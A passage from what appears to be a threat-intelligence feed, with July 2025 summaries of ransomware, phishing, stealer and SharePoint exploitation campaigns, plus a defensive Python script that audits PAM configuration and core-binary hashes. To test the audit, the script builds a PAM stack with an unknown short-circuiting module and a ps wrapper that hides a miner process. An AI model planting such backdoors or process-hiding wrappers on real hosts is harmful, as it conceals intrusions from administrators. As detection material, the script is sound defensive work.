Researchers at Solar 4RAYS have identified ongoing activity by the financially motivated hacker group Proxy Trickster, active since early 2024 and targeting public-facing servers worldwide to monetize compromised infrastructure through proxyjacking and cryptocurrency mining. The group exploits known vulnerabilities in services like Selenium Grid and uses weak SSH credentials to gain initial access and root privileges. Once inside, they deploy multi-stage Bash and PowerShell scripts to replace system utilities (ps, pstree, pkill), hide malicious processes, and maintain persistence using cron jobs on Unix and scheduled tasks on Windows. Between 2024 and 2025, Proxy Trickster has compromised hundreds of servers in 58 countries, including the U.S., Germany, Russia, and China, even demonstrating the ability to exploit hypervisors for enhanced resource hijacking. Their proxyjacking activities, involving bandwidth resale via platforms like Packetshare, Honeygain, and Trafficmonetizer, have significantly outperformed their mining operations, generating over $3,400 in revenue within a year.
Source: https://rt-solar.ru/solar-4rays/blog/5714/
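The Plague entry above describes a backdoor that lives in the PAM stack, and the Proxy Trickster entry describes system utilities (ps, pstree, pkill) replaced with filtering wrappers. Both are caught by the same kind of host audit: parse the PAM configuration for modules that are unknown or can short-circuit authentication, and compare core binaries against a known-good hash baseline. The code below is an added example, not Nextron's or Solar 4RAYS' tooling; the PAM configuration, the module name pam_helper.so and the fake binaries are constructed, and the known-module list is a starting point for a real allowlist.

```python
"""Host audit for the two persistence spots above: a PAM auth stack an
unknown module can short-circuit, and replaced core utilities. Added
example; the PAM config, module name and binaries are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

PAM_LINE = re.compile(
    r"^-?(?P<type>auth|account|password|session)\s+"
    r"(?P<control>\[[^\]]*\]|\S+)\s+(?P<module>\S+)(?P<args>.*)$")
STANDARD_DIRS = ("/lib/security/", "/lib64/security/", "/usr/lib/security/",
                 "/usr/lib64/security/", "/usr/lib/x86_64-linux-gnu/security/")
KNOWN_MODULES = {"pam_env.so", "pam_unix.so", "pam_deny.so", "pam_permit.so",
                 "pam_faildelay.so", "pam_faillock.so", "pam_sss.so", "pam_systemd.so",
                 "pam_limits.so", "pam_nologin.so", "pam_pwquality.so", "pam_motd.so"}


def audit_pam(config: str, known=KNOWN_MODULES) -> List[str]:
    """Flag unknown modules, non-standard module paths, an unknown module that
    can grant auth before pam_unix runs, and nullok on pam_unix."""
    findings: List[str] = []
    unix_seen = False
    for n, raw in enumerate(config.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("@include"):
            continue
        m = PAM_LINE.match(line)
        if not m:
            findings.append(f"line {n}: unparsable entry: {line}")
            continue
        ptype, control, module = m["type"], m["control"], m["module"]
        args = m["args"].split()
        base = module.rsplit("/", 1)[-1]
        if module.startswith("/") and not module.startswith(STANDARD_DIRS):
            findings.append(f"line {n}: module loaded from non-standard path {module}")
        if base not in known:
            findings.append(f"line {n}: unknown module {base}")
            # 'sufficient' (or success=done) before pam_unix means this module
            # alone can approve the login; the real password check never runs.
            if ptype == "auth" and not unix_seen and (
                    control == "sufficient" or "success=done" in control):
                findings.append(f"line {n}: {base} can short-circuit auth before pam_unix.so")
        if base == "pam_unix.so":
            if ptype == "auth":
                unix_seen = True
            if "nullok" in args:
                findings.append(f"line {n}: pam_unix.so nullok permits empty passwords")
    return findings


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_binaries(root: Path, baseline: Dict[str, str]) -> List[str]:
    """Compare files under root with known-good SHA-256 hashes (on a real host:
    a manifest taken at build time, or the package manager's own verify mode)."""
    problems: List[str] = []
    for rel, expected in sorted(baseline.items()):
        p = root / rel
        if not p.exists():
            problems.append(f"{rel}: missing")
        elif sha256_file(p) != expected:
            problems.append(f"{rel}: hash mismatch")
    return problems


# Constructed /etc/pam.d/common-auth; pam_helper.so is a made-up name.
SAMPLE_PAM_AUTH = """\
# common-auth (constructed sample)
auth    required    pam_env.so
auth    sufficient  /usr/local/lib/pam_helper.so
auth    [success=1 default=ignore]  pam_unix.so nullok try_first_pass
auth    requisite   pam_deny.so
auth    required    pam_permit.so
"""


def build_sample_tree() -> Tuple[Path, Dict[str, str]]:
    """Create three fake utilities, record their hashes, then overwrite ps with
    a wrapper that hides a process, as the Proxy Trickster scripts do."""
    root = Path(tempfile.mkdtemp())
    (root / "bin").mkdir()
    baseline: Dict[str, str] = {}
    for name in ("ps", "pstree", "pkill"):
        p = root / "bin" / name
        p.write_bytes(b"#!/bin/sh\n# original " + name.encode() + b"\n")
        baseline[f"bin/{name}"] = sha256_file(p)
    (root / "bin" / "ps").write_bytes(b"#!/bin/sh\n/bin/ps.orig \"$@\" | grep -v miner\n")
    return root, baseline


if __name__ == "__main__":
    for f in audit_pam(SAMPLE_PAM_AUTH):
        print("PAM:", f)
    root, baseline = build_sample_tree()
    for f in verify_binaries(root, baseline):
        print("BIN:", f)
```

On a real host the baseline comes from outside the box (a golden image manifest, or `dpkg -V` / `rpm -Va` run from a trusted boot), because a replaced `ps` will happily lie to any check that runs through it; the PAM audit should also be run against every file in /etc/pam.d, not just the auth stack.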
2025-07-27
Chaos_Ransomware_Group
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Chaos_Ransomware_Group
Date of Scan:
2025-07-27
Impact:
MEDIUM
Summary:
Cisco Talos researchers have uncovered a new ransomware group called Chaos, which operates under a Ransomware-as-a-Service (RaaS) model. This group has been active since early 2025 and leverages voice phishing and stolen credentials to infiltrate victim networks. Once inside, they quickly encrypt files and steal sensitive data, demanding ransom for decryption while threatening to leak stolen data or launch DDoS attacks. Chaos targets organizations across various sectors globally, with confirmed victims in the U.S., U.K., India, and New Zealand. They abuse legitimate tools like Microsoft Quick Assist for remote access and RMM software such as AnyDesk and ScreenConnect for persistence and lateral movement. Additionally, researchers believe Chaos may be a rebranded version of the BlackSuit (formerly Royal) ransomware group, based on similarities in tools, attack methods, and ransom notes.
Source: https://blog.talosintelligence.com/new-chaos-ransomware/
2025-07-27
Gunra_Ransomware_with_Dedicated_Leak_Sites
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Gunra_Ransomware_with_Dedicated_Leak_Sites
Date of Scan:
2025-07-27
Impact:
MEDIUM
Summary:
Gunra ransomware surfaced in April 2025, exploiting Conti's leaked source code to deploy a new Dedicated Leak Site (DLS) infrastructure and pressure victims into rapid negotiation. According to AhnLab TIP's analysis, the group orchestrates multi-threaded file encryption using ChaCha20 and RSA public-key routines before deleting volume shadow copies to inhibit recovery. Its execution thread scales to available CPU cores and targets Windows systems exclusively, dropping a ransom note named R3ADM3.txt to direct victims to a Tor-based payment portal. Motivated by financial extortion, Gunra refines social engineering by enforcing victim response within five days, heightening urgency. The emergence of multiple Gunra DLS instances between April and June 2025 signals an evolving threat landscape likely to expand leak postings and automation.
Source: https://asec.ahnlab.com/en/89206/
2025-07-27
Malicious_Solana_Trading_Bot_Steals_Private_Keys
MEDIUM
+
Intel Source:
Slowmist (Medium)
Intel Name:
Malicious_Solana_Trading_Bot_Steals_Private_Keys
Date of Scan:
2025-07-27
Impact:
MEDIUM
Summary:
Researchers at SlowMist have identified a malicious open-source Solana trading bot, deceptively distributed via GitHub, designed to exfiltrate private wallet keys from unsuspecting users. The project, disguised as a legitimate trading tool under the repository pumpfun-pumpswap-sniper-copy-trading-bot, abuses social engineering and code obfuscation to lure victims into execution. Upon launch, the bot harvests the victim’s private key from a local .env file and sends it to a hardcoded command-and-control (C2) server operated by the attacker. The attack leverages the create_coingecko_proxy() function to perform the exfiltration while masking the malicious intent with seemingly benign API interactions.
Source: https://slowmist.medium.com/threat-intelligence-an-analysis-of-a-malicious-solana-open-source-trading-bot-ab580fd3cc89
2025-07-26
Interlock_Ransomware_Using_ClickFix_Tactic
MEDIUM
Intel Source:
CISA
Intel Name:
Interlock_Ransomware_Using_ClickFix_Tactic
Date of Scan:
2025-07-26
Impact:
MEDIUM
Summary:
A joint advisory issued by the FBI, CISA, HHS, and MS-ISAC reports that Interlock ransomware actors deploy a clickjacking social engineering tactic dubbed ClickFix to trick users into executing a Base64-encoded PowerShell payload. These actors gain initial access via drive-by compromises on legitimate websites, masquerading malicious payloads as browser or security-software updates. Upon gaining access, the threat actors leverage PowerShell to conduct reconnaissance, establish persistence via registry run-key modifications, and harvest credentials using keyloggers and browser-stealer binaries. The group exfiltrates data to Microsoft Azure Storage using AzCopy prior to deploying file encryption on both Windows and Linux systems using AES/RSA and FreeBSD ELF encryptors. The primary targets include businesses and critical infrastructure entities across North America and Europe.
Source: https://www.cisa.gov/sites/default/files/2025-07/aa25-203a-stopransomware-interlock-072225.pdf
2025-07-26
Fake_Zoom_Call_Lures
LOW
Intel Source:
Cofense
Intel Name:
Fake_Zoom_Call_Lures
Date of Scan:
2025-07-26
Impact:
LOW
Summary:
Cofense researchers discovered a phishing campaign where attackers simulate Zoom connection issues to deceive users into revealing their Zoom Workplace credentials. The threat actors send urgent-themed spear-phishing emails with deceptive meeting URLs that redirect victims through several steps to a convincing fake Zoom login page. After displaying a fraudulent "connection timed out" message, the page asks the user to log in again in order to capture their email, password, IP address and location. The stolen information is exfiltrated through a Telegram bot. After gaining valid SSO credentials, the attackers can gain a foothold within targeted organizations, enabling lateral movement and establishing persistent access.
Source: https://cofense.com/blog/fake-zoom-call-lures-for-zoom-workplace-credentials
2025-07-26
Recent_Themed_Social_Engineering_Campaigns
LOW
Intel Source:
Miscellaneous
Intel Name:
Recent_Themed_Social_Engineering_Campaigns
Date of Scan:
2025-07-26
Impact:
LOW
Summary:
Researchers have identified three active campaigns exploiting user trust and popular platforms. FoxyWallet uses over 40 fake Firefox extensions to impersonate crypto wallets like MetaMask and Coinbase, stealing seed phrases and private keys. A Prime Day phishing campaign uses fake Amazon domains and urgent emails to harvest login and payment credentials. Meanwhile, a CAPTCHA-based social engineering campaign tricks users into executing clipboard-injected PowerShell scripts, leading to malware installation after virtual environment checks are bypassed.
Source: http://www.securonix.com
2025-07-25
PureRAT_Delivers_Via_Ghost_Crypt
LOW
Intel Source:
Esentire
Intel Name:
PureRAT_Delivers_Via_Ghost_Crypt
Date of Scan:
2025-07-25
Impact:
LOW
Summary:
Researchers at eSentire uncovered a campaign that employed a new encryption tool called Ghost Crypt to deliver PureRAT through a PDF link hosted on Zoho WorkDrive, targeting a certified public accounting firm in the United States. The attackers impersonate a new client to trick the victim into downloading a ZIP archive containing a malicious EXE and a DLL file encrypted with Ghost Crypt. Once executed, the DLL injects PureRAT into a legitimate Windows process (csc.exe) using a technique called process hypnosis. After running, PureRAT collects system details, hardware identifiers, data from cryptocurrency apps and browser extensions, and then exfiltrates the information to an attacker-controlled server via a secure encrypted channel.
Source: https://www.esentire.com/blog/ghost-crypt-powers-purerat-with-hypnosis
2025-07-25
New_Windows_Malware_Campaign
MEDIUM
Intel Source:
ASEC
Intel Name:
New_Windows_Malware_Campaign
Date of Scan:
2025-07-25
Impact:
MEDIUM
Summary:
Researchers at ASEC have uncovered a campaign targeting Windows users through malicious LNK files disguised as security verification messages from card companies. When opened, these files execute a hidden script that loads malicious code directly into memory without being saved to disk. The malware then injects itself into browsers and system processes to operate stealthily. It uses separate modules to capture sensitive data—one steals login credentials and records keystrokes, while another acts as a backdoor, enabling remote command execution, file access and data exfiltration.
Source: https://asec.ahnlab.com/ko/89126/
2025-07-25
Mimo_Targets_Magento_based_Ecommerce_Platforms
LOW
Intel Source:
Datadog
Intel Name:
Mimo_Targets_Magento_based_Ecommerce_Platforms
Date of Scan:
2025-07-25
Impact:
LOW
Summary:
Datadog researchers have identified that the Mimo threat actor, also known as Mimo’lette, is targeting Magento-based ecommerce platforms and publicly exposed Docker Engine APIs. The group exploits an unidentified vulnerability in PHP-FPM to gain initial access via reverse shell injection. Mimo’s primary objective is financial gain through cryptomining using a customized XMRig miner connected to C3Pool and proxyjacking by reselling victims’ bandwidth via IPRoyal Pawns. To maintain persistence, Mimo leverages encrypted tunneling with GSocket along with cron-based task scheduling and in-memory payload execution using memfd_create to evade disk-based detection and forensics.
Source: https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker/
2025-07-23
SharePoint_Unauthenticated_ToolPane_RCE
HIGH
Intel Source:
Akamai
Intel Name:
SharePoint_Unauthenticated_ToolPane_RCE
Date of Scan:
2025-07-23
Impact:
HIGH
Summary:
A critical remote code execution vulnerability in SharePoint’s ToolPane.aspx component places on-premises servers at immediate risk. According to Akamai Security Intelligence Group’s telemetry, Microsoft’s July 19, 2025 disclosure of CVE-2025-53770 revealed that over 20 percent of observed environments, particularly legacy SharePoint 2010 and 2013 instances, remain unpatched. Attackers deliver a malformed HTTP header to bypass authentication, then exploit a deserialization flaw (CVE-2025-49704) via a malicious ASPX payload to extract MachineKey values and sign arbitrary VIEWSTATE chains for stealthy execution in w3wp.exe.
Source: https://www.akamai.com/blog/security-research/2025/jul/sharepoint-vulnerability-rce-active-exploitation-detections-mitigations
2025-07-23
Malicious_LNK_Infostealer_via_Credit_Card_Pop_Up
MEDIUM
Intel Source:
ASEC
Intel Name:
Malicious_LNK_Infostealer_via_Credit_Card_Pop_Up
Date of Scan:
2025-07-23
Impact:
MEDIUM
Summary:
Researchers at ASEC have observed a campaign deploying malicious LNK shortcuts disguised as credit card authentication prompts to install infostealer and backdoor components. Discovered July 22, 2025, the attack leverages a decoy HTML file that, upon execution, triggers an HTA script to retrieve a reflective-loading DLL (sys.dll) and associated modules into the user’s AppData\Local directory. The DLL injects “app” and “net” payloads into browser processes (Chrome, Edge, Opera, Firefox) to harvest stored credentials and communication tokens, while a keylogging backdoor logs keystrokes and maintains covert remote access.
Source: https://asec.ahnlab.com/en/89156/
2025-07-23
Chinese_Actors_Exploiting_SharePoint_Vulnerability
HIGH
Intel Source:
Microsoft
Intel Name:
Chinese_Actors_Exploiting_SharePoint_Vulnerability
Date of Scan:
2025-07-23
Impact:
HIGH
Summary:
Researchers from Microsoft have observed that Chinese state-sponsored threat actors including Linen Typhoon, Violet Typhoon and Storm-2603 are actively exploiting critical on-premises Microsoft SharePoint vulnerabilities to gain unauthorized remote code execution and deploy web shells for data collection. The attackers leverage CVE-2025-49706 and CVE-2025-49704 to bypass authentication and CVE-2025-53770 and CVE-2025-53771 to achieve remote code execution on internet-facing SharePoint servers. In post-exploitation activity, the attackers deploy custom ASPX web shells (spininstallo.aspx) to retrieve MachineKey configuration data and exfiltrate it via HTTP requests. The primary targets are organizations running supported versions of on-premises SharePoint Server, including Subscription Edition, 2019, and 2016.
Source: https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/
2025-07-23
Advanced_Version_of_ACRStealer
LOW
Intel Source:
ASEC
Intel Name:
Advanced_Version_of_ACRStealer
Date of Scan:
2025-07-23
Impact:
LOW
Summary:
ASEC researchers have discovered a more advanced version of the ACRStealer info-stealer, which is designed to secretly exfiltrate sensitive data from compromised systems, including browser credentials, cryptocurrency wallets, FTP and cloud storage credentials, and document repositories. It leverages a technique called DeadDropResolver (DDR) to hide its C2 servers inside Google Docs and Steam and establishes a stealthy communication channel using a custom socket driver to bypass library-based monitoring. The malware encrypts configuration data using a combination of Base64, RC4, and AES-256-CBC encryption. Additionally, it communicates with multiple C2 endpoints for retrieving payloads, determining routes, and exfiltrating stolen data over HTTP/HTTPS, using spoofed domains like microsoft.com and avast.com.
Source: https://asec.ahnlab.com/ko/89115/
2025-07-22
NailaoLocker_Cheese_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
NailaoLocker_Cheese_Ransomware
Date of Scan:
2025-07-22
Impact:
MEDIUM
Summary:
FortiGuard Labs has identified a high-severity variant of NailaoLocker ransomware dubbed “Cheese” targeting Microsoft Windows environments and encrypting nearly all accessible user files with AES-256-CBC and embedded SM2 cryptographic keys to extort victims for illicit financial gain. Delivered through a DLL sideloading chain involving a legitimate usysdiag.exe dropper and a malicious sensapi.dll loader, the malware leverages an IO completion port–based, multi-threaded architecture to traverse logical drives, encrypt data, and drop ransom notes without disrupting critical system paths.
Source: https://www.fortinet.com/blog/threat-research/nailaolocker-ransomware-cheese
2025-07-22
Active_ToolShell_SharePoint_Exploits
HIGH
Intel Source:
Unit42 and Sentinelone
Intel Name:
Active_ToolShell_SharePoint_Exploits
Date of Scan:
2025-07-22
Impact:
HIGH
Summary:
According to SentinelOne and Unit42’s analysis, multiple adversary clusters have targeted on-premises Microsoft SharePoint servers since mid-July 2025 by chaining legacy CVE-2025-49704/49706 flaws with the zero-day bypass CVE-2025-53770/53771, known as ToolShell. Initial hands-on exploitation deployed a password-protected ASPX webshell before advancing to the reconnaissance utility spinstallIO.aspx and ultimately a fileless .NET module that extracts MachineKey cryptographic secrets for credential forging and persistence. Attackers leveraged a logic flaw in SharePoint’s ToolPane.aspx Referer validation to achieve unauthenticated remote code execution, then executed in-memory PowerShell and .NET payloads to move laterally and maintain stealth. Victims included high-value organizations in technology consulting, manufacturing, critical infrastructure, and professional services, indicating strategic targeting of engineering and architecture assets.
Source: https://www.sentinelone.com/blog/sharepoint-toolshell-zero-day-exploited-in-the-wild-targets-enterprise-servers/ https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/
2025-07-22
SVF_DDoS_Botnet_via_SSH_Compromise
LOW
Intel Source:
ASEC
Intel Name:
SVF_DDoS_Botnet_via_SSH_Compromise
Date of Scan:
2025-07-22
Impact:
LOW
Summary:
Researchers at ASEC have observed threat actors exploiting weak SSH credentials on unmanaged Linux servers to deploy a Python-based DDoS framework dubbed SVF. In mid-July 2025, AhnLab Security Intelligence Center’s analysts discovered that SVF leverages automated dictionary attacks to seize SSH access, then installs a lightweight Python agent that connects to a Discord channel for command-and-control. The malware dynamically harvests and validates public HTTP proxies to orchestrate both Layer 7 HTTP floods and Layer 4 UDP amplification, rapidly scaling attack volume with minimal footprint.
Source: https://asec.ahnlab.com/en/89083/
2025-07-21
GLOBAL_GROUP_Ransomware
MEDIUM
Intel Source:
Picus Security
Intel Name:
GLOBAL_GROUP_Ransomware
Date of Scan:
2025-07-21
Impact:
MEDIUM
Summary:
Researchers at Picus Security have uncovered that GLOBAL GROUP is a rebranded evolution of the Mamona RIP and Black Lock ransomware families, now operating as a Ransomware-as-a-Service (RaaS) platform. This threat actor delivers Golang-compiled, cross-platform binaries that leverage ChaCha20-Poly1305 encryption to lock files and enforce a double-extortion model, threatening to publish stolen data if ransom demands are not met. The platform allows affiliates to customize key parameters, including file extensions (.lockbitloch), filename encryption, and optional destructive flags such as self-deletion, log erasure, and process termination—demonstrating operational maturity. Victims include corporate environments—one confirmed case involved RDP access to a U.S. law firm secured by an Initial Access Broker—indicating a focus on professional services networks. Impact potential is severe: encrypted business-critical data, reputational damage, multi-million-dollar ransom demands facilitated by an AI-driven Tor negotiation portal, and pervasive affiliate scaling. GLOBAL GROUP’s integration of automated negotiations, API-exposed SSH credentials, and modular payload generation underscores both sophistication and OPSEC liabilities.
Source: https://www.picussecurity.com/resource/blog/tracking-global-group-ransomware-from-mamona-to-market-scale
2025-07-21
Unauthenticated_SharePoint_RCE_Exploitation
HIGH
Intel Source:
Eye Security
Intel Name:
Unauthenticated_SharePoint_RCE_Exploitation
Date of Scan:
2025-07-21
Impact:
HIGH
Summary:
According to Eye Security, the ToolShell chain (CVE-2025-53770) enables unauthenticated remote code execution against on-premises SharePoint servers, resulting in stealthy deployment of a crypto-exfiltration payload called spinstall0.aspx. The exploit combines a SignOut.aspx referer bypass with a vulnerability in the ToolPane.aspx endpoint to drop a PowerShell-based ASPX web shell. The shell extracts the SharePoint MachineKey and ValidationKey, allowing attackers to craft signed __VIEWSTATE tokens via ysoserial for full RCE without credentials. Dozens of servers across multiple regions were compromised within hours, demonstrating the campaign’s scale and speed. Extraction of cryptographic keys undermines authentication, enabling forgery of subsequent payloads and domain-wide access. Successful exploitation threatens lateral movement, data theft, and persistent backdoor access. Microsoft has yet to issue a patch, making immediate detection and mitigation critical.
Source: https://research.eye.security/sharepoint-under-siege/
2025-07-20
KongTuke_FileFix_Interlock_RAT_Variant
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
KongTuke_FileFix_Interlock_RAT_Variant
Date of Scan:
2025-07-20
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have observed a new PHP-based variant of the Interlock RAT deployed via KongTuke FileFix web-injection campaigns since May 2025, with the PHP payload first identified in June 2025. The Interlock ransomware group compromises legitimate websites to inject a single-line HTML snippet that performs IP-filtered redirection and presents a deceptive CAPTCHA prompt to lure users into executing a PowerShell command which drops a PHP binary into the AppData\Roaming directory.
Source: https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/
2025-07-20
LAMEHUG_LLM_Reconnaissance_Tool
MEDIUM
Intel Source:
CERT-UA
Intel Name:
LAMEHUG_LLM_Reconnaissance_Tool
Date of Scan:
2025-07-20
Impact:
MEDIUM
Summary:
Researchers from CERT-UA have observed APT operators designated UAC-0001 deploy malicious email attachments on 10 July 2025 posing as official ministry correspondence to deliver a PyInstaller-compiled loader. That loader installs LAMEHUG, a Python-based framework leveraging the Qwen 2.5-Coder-32B LLM via a public API to generate and execute contextual reconnaissance commands. Subsequent iterations broadened its AI-driven exfiltration routines and extended search capabilities. Operators abused a compromised email account and legitimate cloud infrastructure to evade detection on Windows NT 10.0 x64 hosts. LAMEHUG harvests system inventories via native utilities (WMIC, systeminfo, ipconfig) and recursively locates, copies and stages Office and PDF documents for exfiltration.
Source: https://cert.gov.ua/article/6284730
2025-07-20
macOS_ZuRu_Termius_Trojan
LOW
Intel Source:
Sentinelone
Intel Name:
macOS_ZuRu_Termius_Trojan
Date of Scan:
2025-07-20
Impact:
LOW
Summary:
According to SentinelOne’s analysis, a novel variant of the macOS.ZuRu backdoor has emerged through a trojanized version of the cross-platform SSH client Termius, delivering a modified Khepri C2 beacon that establishes persistent, stealthy access on macOS endpoints. First observed in May 2025, this campaign repackages legitimate Termius.app bundles with additional Mach-O binaries and a Khepri loader, leveraging LaunchDaemon persistence and deprecated AuthorizationExecuteWithPrivileges calls to escalate privileges. The modified beacon employs DNS-based communication on port 53 with decoy domains and an Alibaba Cloud C2, supporting file transfer, system reconnaissance, process control, and command execution.
Source: https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/
2025-07-19
CL_STA_1020_Targeting_Government_Entities
MEDIUM
Intel Source:
Palo Alto
Intel Name:
CL_STA_1020_Targeting_Government_Entities
Date of Scan:
2025-07-19
Impact:
MEDIUM
Summary:
Researchers from Unit42 have discovered a cyber-espionage campaign, tracked as CL-STA-1020, targeting government organizations in Southeast Asia to collect sensitive information related to recent trade disputes. The attackers use a custom-made malware called HazyBeacon which is installed through DLL sideloading by disguising it as a legitimate Windows file and establishing persistence through a custom Windows service named msdnetsvc. The malware communicates with actor-controlled AWS Lambda URLs to make the network traffic appear normal by hiding it within standard HTTPS cloud operations to evade detection. Additionally, the threat actors download multiple payloads such as a file collector, 7-Zip archiver, and custom tools for uploading stolen files to Google Drive/Dropbox.
Source: https://unit42.paloaltonetworks.com/windows-backdoor-for-novel-c2-communication/
2025-07-19
Red_Bull_Recruitment_Phishing_Campaign
LOW
Intel Source:
Evalian
Intel Name:
Red_Bull_Recruitment_Phishing_Campaign
Date of Scan:
2025-07-19
Impact:
LOW
Summary:
Evalian researchers have discovered a phishing campaign impersonating the Red Bull recruitment team, targeting job seekers through spear phishing emails. These emails contain embedded links that redirect recipients to a fraudulent but legitimate-looking job application site protected by a reCAPTCHA challenge to enhance its apparent legitimacy. Victims are then taken to a spoofed Facebook login page designed to harvest credentials, which are subsequently transmitted to an attacker-controlled server. This malicious infrastructure is hosted on low-trust VPS services under ASN 63023 and hidden behind newly registered domains. If victims reuse their Facebook credentials across other platforms, the stolen information could facilitate account takeovers, unauthorized system access, and data exfiltration.
Source: https://evalian.co.uk/inside-a-red-bull-themed-recruitment-phishing-campaign/
2025-07-18
SonicWall_SMA_Exploitation_via_OVERSTEP
HIGH
Intel Source:
Google Threat Intelligence
Intel Name:
SonicWall_SMA_Exploitation_via_OVERSTEP
Date of Scan:
2025-07-18
Impact:
HIGH
Summary:
Google Threat Intelligence Group has observed financially motivated activity by the threat actor UNC6148 targeting end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances. These campaigns exploit known vulnerabilities in unpatched or outdated devices to gain initial access. UNC6148 leveraged these vulnerabilities to obtain administrator credentials and one-time password (OTP) seed values—effectively bypassing multi-factor authentication (MFA). Once inside, they deployed OVERSTEP, a previously undocumented user-mode rootkit and backdoor. OVERSTEP achieves persistence through multiple techniques: injecting a malicious shared object via /etc/ld.so.preload and modifying the system’s INITRD image, allowing the malware to survive reboots. The rootkit covertly hijacks file API functions to hide its presence, establishes reverse shells using bash, and exfiltrates sensitive data—including SQLite databases and certificate files—through web-accessible directories. The primary targets are organizations with externally exposed SMA appliances running outdated firmware. The compromise facilitates credential theft, undermines authentication mechanisms, enables extortion, and may lay the groundwork for future ransomware attacks.
Source: https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor
2025-07-18
SVG_Smuggling_via_JavaScript_Redirects
LOW
Intel Source:
Ontinue
Intel Name:
SVG_Smuggling_via_JavaScript_Redirects
Date of Scan:
2025-07-18
Impact:
LOW
Summary:
Researchers at Ontinue have identified a threat campaign where attackers embed obfuscated JavaScript in SVG image files to perform browser-based redirects to attacker-controlled infrastructure for victim tracking and correlation. Delivered via spearphishing emails—either as attachments or hosted image links—the campaign exploits misconfigured SPF, DKIM, and DMARC settings to spoof trusted senders. The embedded JavaScript decrypts a secondary payload using a static XOR key, reconstructs a malicious URL with atob(), and redirects the victim using window.location.href. Later campaign stages add geofencing to selectively target users. By abusing the benign SVG format and requiring no downloads or macros, the method bypasses traditional defenses. Victims include B2B service providers in finance, utilities, HR, and SaaS sectors.
Source: https://www.ontinue.com/resource/blog-svg-smuggling/
2025-07-18
KAWA4096_Ransomware_Surge
MEDIUM
Intel Source:
Trustwave
Intel Name:
KAWA4096_Ransomware_Surge
Date of Scan:
2025-07-18
Impact:
MEDIUM
Summary:
According to Trustwave SpiderLabs’ analysis, KAWA4096 emerged in June 2025 as a new ransomware strain blending code elements from the Akira family with a bespoke leak-site design. The group has claimed at least 11 victims, primarily in the United States and Japan. This Windows-targeting malware loads its configuration via the LoadResource API, spawns multiple threads synchronized by semaphores to encrypt local and network drives, and terminates backup, database and SAP services via SCM and WMI commands to maximize disruption. It also deletes shadow copies and can self-delete post-encryption, reflecting advanced evasion techniques.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/kawa4096s-ransomware-tide-rising-threat-with-borrowed-styles/
2025-07-18
UNG0002_South_Asian_Espionage_Campaign
MEDIUM
Intel Source:
Seqrite
Intel Name:
UNG0002_South_Asian_Espionage_Campaign
Date of Scan:
2025-07-18
Impact:
MEDIUM
Summary:
Seqrite Labs researchers have identified that a sophisticated and persistent threat actor, UNG0002, has been conducting espionage-oriented operations targeting multiple Asian jurisdictions since at least May 2024. Believed to originate from South-East Asia, the group's campaigns, "Operation Cobalt Whisper" and "Operation AmberMist," leverage multi-stage attacks beginning with CV-themed phishing lures to gain initial access. The actor employs a versatile toolset including custom remote access trojans (RATs) like Shadow RAT and INET RAT, alongside techniques such as DLL sideloading and a social engineering method dubbed "ClickFix" that uses fake CAPTCHA pages to execute malicious scripts. UNG0002's primary motivation is intelligence gathering, with a strategic focus on the defense, technology, aviation, and academic sectors. The group demonstrates high adaptability by mimicking the TTPs of other threat actors to complicate attribution and is continuously evolving its malware, indicating that future campaigns will likely feature refined tools and expanded targeting.
Source: https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/
2025-07-18
GhostContainer_Targets_MS_Exchange_Servers_in_Asia
MEDIUM
Intel Source:
Securelist
Intel Name:
GhostContainer_Targets_MS_Exchange_Servers_in_Asia
Date of Scan:
2025-07-18
Impact:
MEDIUM
Summary:
Researchers at Securelist have uncovered a new backdoor, dubbed GhostContainer, targeting Microsoft Exchange servers belonging to high-value organizations in Asia, including a government agency and a high-tech enterprise. The threat actors likely exploited a known N-day vulnerability in Exchange—suspected to be CVE-2020-0688—to gain initial access. After exploitation, they deployed a malicious ASP.NET assembly named App_Web_Container_1.dll onto the compromised servers. GhostContainer employs several advanced evasion techniques. It disables Windows Event Logging and patches the Antimalware Scan Interface (AMSI) to avoid detection. It also derives an AES encryption key from the Exchange server’s ASP.NET machine validation key, using it to decrypt commands embedded as Base64 strings in the x-owa-urlpostdata HTTP header. The malware’s Stub class is capable of executing shellcode, running system commands, performing file operations, and dynamically loading additional .NET modules. Additionally, GhostContainer includes a virtual page injector and web proxy module that support HTTP-based tunneling for command-and-control and data exfiltration.
Source: https://securelist.com/ghostcontainer/116953/
2025-07-17
NimDoor_macOS_Cryptocurrency_Stealer
LOW
Intel Source:
Polyswarm
Intel Name:
NimDoor_macOS_Cryptocurrency_Stealer
Date of Scan:
2025-07-17
Impact:
LOW
Summary:
Researchers from The Hivemind have observed a sophisticated macOS malware campaign deployed by the North Korea–linked threat actor group Stardust Chollima against Web3 and cryptocurrency organizations. First detected in April 2025, NimDoor leverages social engineering via Telegram to trick victims into installing a fake “Zoom SDK update” AppleScript, which then launches a multi-stage payload comprising Nim-compiled binaries, C++ Mach-O loaders and encrypted WebSocket C2 channels. A novel SIGTERM/SIGINT-based persistence mechanism, backed by a LaunchAgent fallback, ensures reinfection if the process is terminated or upon reboot.
Source: https://blog.polyswarm.io/nimdoor-macos-malware
2025-07-17
Rainbow_Hyena_Phishing_Alert
HIGH
Intel Source:
BI.ZONE
Intel Name:
Rainbow_Hyena_Phishing_Alert
Date of Scan:
2025-07-17
Impact:
HIGH
